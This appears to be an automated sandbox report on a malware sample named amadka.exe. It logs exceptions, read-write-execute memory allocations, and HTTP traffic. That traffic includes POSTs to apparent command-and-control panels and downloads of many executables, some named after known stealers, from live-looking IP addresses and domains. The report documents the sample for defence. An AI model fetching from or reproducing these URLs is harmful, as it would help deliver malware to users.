__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 55 89 e5 e9 64 fc ff ff 5f 47 c1 e7 03 e9 15 exception.symbol: amadka+0x217ffb exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2195451 exception.address: 0x1097ffb registers.esp: 2226220 registers.edi: 84201 registers.eax: 32680 registers.ebp: 4005662740 registers.edx: 4294937608 registers.ebx: 17431324 registers.esi: 1968968720 registers.ecx: 867346143	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 e9 00 00 00 00 89 exception.symbol: amadka+0x219768 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2201448 exception.address: 0x1099768 registers.esp: 2226220 registers.edi: 84201 registers.eax: 30757 registers.ebp: 4005662740 registers.edx: 17434560 registers.ebx: 1373341519 registers.esi: 1968968720 registers.ecx: 1816543958	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 68 5e 0f 84 24 89 14 24 50 c7 04 24 50 2b fd exception.symbol: amadka+0x21971e exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2201374 exception.address: 0x109971e registers.esp: 2226220 registers.edi: 76109654 registers.eax: 30757 registers.ebp: 4005662740 registers.edx: 17406828 registers.ebx: 1373341519 registers.esi: 0 registers.ecx: 1816543958	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 52 e9 bd 01 00 00 81 ec 04 00 00 00 89 24 24 exception.symbol: amadka+0x2262de exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2253534 exception.address: 0x10a62de registers.esp: 2226220 registers.edi: 116969 registers.eax: 17486278 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 17453129 registers.esi: 4294940908 registers.ecx: 1788561223	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 29 db ff 34 13 ff 34 24 8b 34 24 81 c4 04 00 exception.symbol: amadka+0x239693 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2332307 exception.address: 0x10b9693 registers.esp: 2226188 registers.edi: 2104534378 registers.eax: 29592 registers.ebp: 4005662740 registers.edx: 17565800 registers.ebx: 2105257326 registers.esi: 2105972533 registers.ecx: 2148100416	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 14 24 89 3c 24 51 e9 94 f7 ff ff exception.symbol: amadka+0x239e32 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2334258 exception.address: 0x10b9e32 registers.esp: 2226188 registers.edi: 2104534378 registers.eax: 29592 registers.ebp: 4005662740 registers.edx: 17565800 registers.ebx: 4294940948 registers.esi: 10938704 registers.ecx: 2148100416	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 68 3d a8 7d 16 89 14 24 55 e9 21 00 00 00 4a exception.symbol: amadka+0x23a789 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2336649 exception.address: 0x10ba789 registers.esp: 2226184 registers.edi: 2104534378 registers.eax: 31121 registers.ebp: 4005662740 registers.edx: 640786447 registers.ebx: 17539870 registers.esi: 10938704 registers.ecx: 2148100416	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 1e ff 34 24 e9 a9 00 00 00 83 e9 exception.symbol: amadka+0x23a896 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2336918 exception.address: 0x10ba896 registers.esp: 2226188 registers.edi: 2104534378 registers.eax: 31121 registers.ebp: 4005662740 registers.edx: 640786447 registers.ebx: 17570991 registers.esi: 10938704 registers.ecx: 2148100416	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 53 89 e3 81 c3 04 00 00 00 83 eb 04 87 1c 24 exception.symbol: amadka+0x23a39e exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2335646 exception.address: 0x10ba39e registers.esp: 2226188 registers.edi: 2104534378 registers.eax: 604292945 registers.ebp: 4005662740 registers.edx: 640786447 registers.ebx: 17570991 registers.esi: 4294938840 registers.ecx: 2148100416	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 56 89 2c 24 bd 38 exception.symbol: amadka+0x23b2e5 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2339557 exception.address: 0x10bb2e5 registers.esp: 2226184 registers.edi: 2104534378 registers.eax: 17542845 registers.ebp: 4005662740 registers.edx: 934770658 registers.ebx: 2141483766 registers.esi: 4294938840 registers.ecx: 707343411	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 55 53 bb 9a 92 dd exception.symbol: amadka+0x23aede exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2338526 exception.address: 0x10baede registers.esp: 2226188 registers.edi: 2104534378 registers.eax: 17568958 registers.ebp: 4005662740 registers.edx: 4294944152 registers.ebx: 432177504 registers.esi: 4294938840 registers.ecx: 707343411	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 56 81 ec 04 00 00 00 89 04 24 54 58 05 04 00 exception.symbol: amadka+0x2403e0 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2360288 exception.address: 0x10c03e0 registers.esp: 2226188 registers.edi: 17593416 registers.eax: 30594 registers.ebp: 4005662740 registers.edx: 0 registers.ebx: 65786 registers.esi: 17547597 registers.ecx: 1971716238	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 03 03 00 00 b8 da 0b 55 36 01 c7 58 68 38 exception.symbol: amadka+0x24027b exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2359931 exception.address: 0x10c027b registers.esp: 2226188 registers.edi: 17566076 registers.eax: 30594 registers.ebp: 4005662740 registers.edx: 0 registers.ebx: 681745805 registers.esi: 17547597 registers.ecx: 0	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 0c 24 e9 5c 04 00 00 56 89 14 24 exception.symbol: amadka+0x24128a exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2364042 exception.address: 0x10c128a registers.esp: 2226184 registers.edi: 17566076 registers.eax: 17566869 registers.ebp: 4005662740 registers.edx: 1489380215 registers.ebx: 15644854 registers.esi: 17547597 registers.ecx: 1849671248	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 51 e9 0e f9 ff ff 8b 0c 24 81 c4 04 00 00 00 exception.symbol: amadka+0x241448 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2364488 exception.address: 0x10c1448 registers.esp: 2226188 registers.edi: 17566076 registers.eax: 17598219 registers.ebp: 4005662740 registers.edx: 1489380215 registers.ebx: 15644854 registers.esi: 17547597 registers.ecx: 1849671248	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 51 89 04 24 e9 dc fe ff ff bb 7f 6c cf 3d 89 exception.symbol: amadka+0x240e33 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2362931 exception.address: 0x10c0e33 registers.esp: 2226188 registers.edi: 17566076 registers.eax: 17569655 registers.ebp: 4005662740 registers.edx: 0 registers.ebx: 15644854 registers.esi: 17547597 registers.ecx: 24811	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 68 01 ee f6 6f e9 8f 07 00 00 5a 81 ec 04 00 exception.symbol: amadka+0x2438f9 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2373881 exception.address: 0x10c38f9 registers.esp: 2226188 registers.edi: 17608049 registers.eax: 30329 registers.ebp: 4005662740 registers.edx: 5902 registers.ebx: 1374295822 registers.esi: 17576872 registers.ecx: 0	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb ba 00 8d 26 76 50 b8 b7 d7 df 7a 81 ea 21 5d exception.symbol: amadka+0x243893 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2373779 exception.address: 0x10c3893 registers.esp: 2226188 registers.edi: 17580641 registers.eax: 30329 registers.ebp: 4005662740 registers.edx: 5902 registers.ebx: 0 registers.esi: 17576872 registers.ecx: 4076340584	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 51 51 89 04 24 56 e9 ee 02 00 00 81 e9 e7 f6 exception.symbol: amadka+0x244647 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2377287 exception.address: 0x10c4647 registers.esp: 2226188 registers.edi: 17580641 registers.eax: 26214 registers.ebp: 4005662740 registers.edx: 1295775248 registers.ebx: 747518614 registers.esi: 17607194 registers.ecx: 1630865404	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 57 e9 a0 01 00 00 55 57 52 c7 04 24 56 54 75 exception.symbol: amadka+0x244719 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2377497 exception.address: 0x10c4719 registers.esp: 2226188 registers.edi: 157417 registers.eax: 26214 registers.ebp: 4005662740 registers.edx: 0 registers.ebx: 747518614 registers.esi: 17584202 registers.ecx: 1630865404	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 9a f9 ff ff 81 ed 60 51 7f 1a 01 c5 81 c5 exception.symbol: amadka+0x259216 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2462230 exception.address: 0x10d9216 registers.esp: 2226184 registers.edi: 17664301 registers.eax: 31390 registers.ebp: 4005662740 registers.edx: 451312160 registers.ebx: 2611859893 registers.esi: 1979891976 registers.ecx: 468962245	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 68 23 99 6d 5d 89 3c 24 e9 aa 00 00 00 5b 57 exception.symbol: amadka+0x2589d9 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2460121 exception.address: 0x10d89d9 registers.esp: 2226188 registers.edi: 17695691 registers.eax: 31390 registers.ebp: 4005662740 registers.edx: 451312160 registers.ebx: 2611859893 registers.esi: 1979891976 registers.ecx: 468962245	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 55 81 ec 04 00 00 00 e9 c4 fe ff ff 35 25 5c exception.symbol: amadka+0x258da7 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2461095 exception.address: 0x10d8da7 registers.esp: 2226188 registers.edi: 17667283 registers.eax: 31390 registers.ebp: 4005662740 registers.edx: 451312160 registers.ebx: 3909414019 registers.esi: 1979891976 registers.ecx: 0	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 60 00 00 00 bd e5 6f d1 2d 89 ee 5d c1 ee exception.symbol: amadka+0x25c54d exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2475341 exception.address: 0x10dc54d registers.esp: 2226188 registers.edi: 17667283 registers.eax: 28961 registers.ebp: 4005662740 registers.edx: 1495915926 registers.ebx: 2075863443 registers.esi: 17707428 registers.ecx: 1736172636	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 55 c7 04 24 c5 f2 b5 75 ff exception.symbol: amadka+0x25c66f exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2475631 exception.address: 0x10dc66f registers.esp: 2226188 registers.edi: 17667283 registers.eax: 28961 registers.ebp: 4005662740 registers.edx: 607947091 registers.ebx: 0 registers.esi: 17681296 registers.ecx: 1736172636	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 81 c3 15 b4 ff 7f e9 98 fe ff ff 01 fb 5f e9 exception.symbol: amadka+0x26843a exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2524218 exception.address: 0x10e843a registers.esp: 2226184 registers.edi: 17714727 registers.eax: 30430 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 17725906 registers.esi: 17682680 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 98 01 00 00 53 89 e3 e9 e4 f7 ff ff 89 14 exception.symbol: amadka+0x268301 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2523905 exception.address: 0x10e8301 registers.esp: 2226188 registers.edi: 17714727 registers.eax: 30430 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 17756336 registers.esi: 17682680 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 a6 07 00 00 ba 84 c8 fb 6b 81 c2 75 ac 37 exception.symbol: amadka+0x267b5b exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2521947 exception.address: 0x10e7b5b registers.esp: 2226188 registers.edi: 0 registers.eax: 30430 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 17728708 registers.esi: 607947091 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 31 c0 ff 34 01 51 89 3c 24 81 ec 04 00 00 00 exception.symbol: amadka+0x2690dc exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2527452 exception.address: 0x10e90dc registers.esp: 2226188 registers.edi: 0 registers.eax: 32060 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 2071306241 registers.esi: 607947091 registers.ecx: 17761249	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (21 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://147.45.47.155/ku4Nor9/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/cost/sarra.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/soka/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/cost/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/well/random.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.77.81/Kiru9gu/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/judit.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/redline123123.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/upd.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/setup222.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/gold.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/lummac2.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/onecommander.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/drivermanager.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/NewKindR.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.172.128.19/ghsdh39s/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.77.81/lend/servoces64.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/b2c2c1.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/FirstZ.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://d1i94yju6i4l9g.cloudfront.net/setup.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://kmsandallapp.ru/Gibson.exe

Performs some HTTP requests (24 events)

request	POST http://147.45.47.155/ku4Nor9/index.php
request	GET http://77.91.77.81/cost/sarra.exe
request	GET http://77.91.77.81/soka/random.exe
request	GET http://77.91.77.81/cost/random.exe
request	GET http://77.91.77.81/well/random.exe
request	POST http://77.91.77.81/Kiru9gu/index.php
request	GET http://77.91.77.81/lend/judit.exe
request	GET http://77.91.77.81/lend/redline123123.exe
request	GET http://77.91.77.81/lend/upd.exe
request	GET http://77.91.77.81/lend/setup222.exe
request	GET http://77.91.77.81/lend/gold.exe
request	GET http://77.91.77.81/lend/lummac2.exe
request	GET http://77.91.77.81/lend/onecommander.exe
request	GET http://77.91.77.81/lend/drivermanager.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://185.172.128.19/NewKindR.exe
request	POST http://185.172.128.19/ghsdh39s/index.php
request	GET http://77.91.77.81/lend/servoces64.exe
request	GET http://185.172.128.19/b2c2c1.exe
request	GET http://185.172.128.19/FirstZ.exe
request	GET http://x1.i.lencr.org/
request	GET https://d1i94yju6i4l9g.cloudfront.net/setup.exe
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://kmsandallapp.ru/Gibson.exe

Sends data using the HTTP POST Method (3 events)

request	POST http://147.45.47.155/ku4Nor9/index.php
request	POST http://77.91.77.81/Kiru9gu/index.php
request	POST http://185.172.128.19/ghsdh39s/index.php

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

kmsandallapp.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 453 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e81000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73402000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:15 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00241000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
